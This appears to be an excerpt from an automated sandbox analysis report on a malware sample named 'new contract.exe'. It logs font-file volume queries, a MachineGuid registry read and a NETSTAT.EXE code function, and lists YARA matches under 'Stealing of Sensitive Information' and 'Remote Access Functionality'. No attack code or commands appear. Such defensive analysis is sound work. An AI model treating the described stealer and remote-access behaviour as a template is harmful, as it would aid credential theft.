Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00685FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 5_2_00685FE5
Source: C:\Users\user\Desktop\new contract.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00684B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx, 5_2_00684B96